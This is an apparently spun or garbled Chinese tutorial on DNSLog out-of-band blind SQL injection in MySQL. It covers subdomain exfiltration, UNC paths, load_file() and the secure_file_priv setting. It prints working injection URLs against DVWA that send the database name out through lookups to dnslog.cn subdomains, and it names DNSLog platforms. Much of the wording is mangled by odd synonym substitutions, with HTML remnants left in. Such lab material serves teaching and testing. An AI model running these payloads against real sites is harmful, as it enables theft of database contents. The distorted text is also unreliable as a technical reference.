DNSLog注入
DNSLog注入原理
在sql注入时为布尔盲注、时间盲注,注入的效率低且线程高轻易被waf拦截,又大概是目的站点没有回显,我们在读取文件、执行命令注入等操作时无法明显简直认是否利用成功,这时间就要用到我们的DNSlog注入。
起首需要有一个可以设置的域名,比如:xxx.io,然后通过署理商设置域名 xxx.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上设置好 DNS Server,这样以来所有 xxx.io 及其子域名的查询都会到 服务器 A 上,这时就能够及时地监控域名查询哀求了。
DNS在剖析的时间会留下日志,咱们这个就是读取多级域名的剖析日志,来获取信息
简单来说就是把信息放在高级域名中,通报到自己这,然后读取日志,获取信息
UNC路径
格式:\servername\sharename,其中servername是服务器名。sharename是共享资源的名称。
目次或文件的UNC名称可以包罗共享名称下的目次路径,格式为:\servername\sharename\directory\filename。
其实我们寻常在Widnows中用共享文件的时间就会用到这种网络地址的情势
\sss.xxx\test
这也就解释了为什么CONCAT()函数拼接了4个\了,因为转义的缘故原由,4个就变\成了2个\,目的就是利用UNC路径。
比方:
- http://dvwa/vulnerabilities/sqli_blind/?id=1' and (select load_file(concat('\\\\',(select database()),'.vlfrr9.dnslog.cn\\abc')))--+&Submit=Submit#
-
-
-
- <ul class="pre-numbering"></ul>
推荐平台
- http://www.dnslog.cn
- http://admin.dnslog.link
- http://ceye.io
-
-
-
- <ul class="pre-numbering"></ul>
通过DNSlog盲注需要用的load_file()函数,所以一般得是root权限。show variables like ‘%secure%’;查看load_file()可以读取的磁盘。
1、当secure_file_priv为空,就可以读取磁盘的目次。
2、当secure_file_priv为G:\,就可以读取G盘的文件。
3、当secure_file_priv为null,load_file就不能加载文件。
如果为Null解决如下:
windows下:修改my.ini 在[mysqld]内加入secure_file_priv =
linux下:修改my.cnf 在[mysqld]内加入secure_file_priv =
如遇到MySql的盲注时,可以利用内置函数load_file()来完成DNSLOG。load_file()不但能够加载当地文件,同时也能对诸如\www.test.com这样的URL发起哀求。
- show variables like '%secure%';
-
-
-
- <ul class="pre-numbering"></ul>
通过设置my.ini来设置。secure_file_priv=""就是可以load_flie恣意磁盘的文件。
- 以管理员身份打开cmd重启后
- net stop mysql
- net start mysql
-
-
-
- <ul class="pre-numbering"></ul>
- http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1' and (select load_file(concat('\\\\',(select database()),'.fl1ka5.dnslog.cn\\abc')))--+&Submit=Submit#
-
-
-
- <ul class="pre-numbering"></ul>
这里利用的是http://www.dnslog.cn/
点击Get SubDomain,将获取的dnslog更换掉,执行以后点击Refresh Record,这样就查询到了我们所需要的数据库名称。表名,字段名亦是如此。
- <div id="content_views" class="htmledit_views">
- <p>这个漏洞不仅仅只是对<span style="color:#fe2c24;"><strong><span style="background-color:#f3f3f4;">SQL注入</span></strong></span>的利用,还是利用到<span style="color:#fe2c24;"><strong><span style="background-color:#f3f3f4;">load_file()</span></strong></span>这个<span class="edu-hl hl hl-1" data-report-click="{"spm":"1001.2101.3001.7020","extra":"{\"word\":\"函数\"}"}" data-tit="函数" data-pretit="函数">函数</span>解析<strong>DNS</strong>时带出的数据漏洞。</p>
|
